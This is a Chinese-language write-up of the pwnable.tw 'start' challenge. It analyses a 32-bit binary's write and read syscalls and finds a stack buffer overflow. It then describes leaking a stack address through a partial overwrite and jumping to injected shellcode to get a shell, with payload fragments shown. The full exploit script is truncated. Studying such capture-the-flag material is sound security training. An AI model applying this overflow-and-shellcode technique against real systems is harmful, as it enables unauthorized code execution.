Pwnable.tw-start
Author: 堇姬Naup
題目
1 | 0x08048060 <+0>: push esp |
分析
先把eax、ebx、ecx、edx清空,再把Let’s start the CTF:
push到stack上
https://chromium.googlesource.com/chromiumos/docs/+/master/constants/syscalls.md#x86-32_bit
1 | mov ecx, esp ; addr |
ecx -> ebp-0x14
edx -> 0x14長度
ebx -> 1 (fd 標準輸出)
eax -> 4 (write)
最後syscall 印出 Let’s start the CTF:
1 | xor ebx, ebx |
ebx -> 0 (fd 標準輸入)
edx -> 0x3c (輸入大小)
eax -> 3 (read)
ecx -> ebp-0x14
最後syscall這裡存在buffer overflow
data:image/s3,"s3://crabby-images/3b0e9/3b0e96512bca28a00921d3d29bcbf473a932c90b" alt=""
這邊發現甚麼都沒開,直接寫shellcode
但須要跳回stack需要leak stack位置(ASLR),這邊發現一開始push了esp,如果我們可以partial overwrite到esp前面之後跳回syscall write,就可以leak了
data:image/s3,"s3://crabby-images/3e622/3e622fd97f7d77a138ff7a3f48be77c0e04b7e7d" alt=""
1 | aaaa |
這樣就可以跳回write把esp address印出來,並且在輸入一次
1 | payload = b'a'*0x14+p32(0x08048087) |
接著構造
b’a’ * 0x14 + leak esp+0x14(我們leak的esp是esp+0x4) + shellcode
1 | aaaa |
data:image/s3,"s3://crabby-images/5e4ae/5e4ae6f842b5431bde478c90f5ed4c3a6c63ef17" alt=""
這樣就get shell
payload
1 | from pwn import * |
data:image/s3,"s3://crabby-images/33f29/33f29a747f6aa0970ac38f8592d9510cd3c8162d" alt=""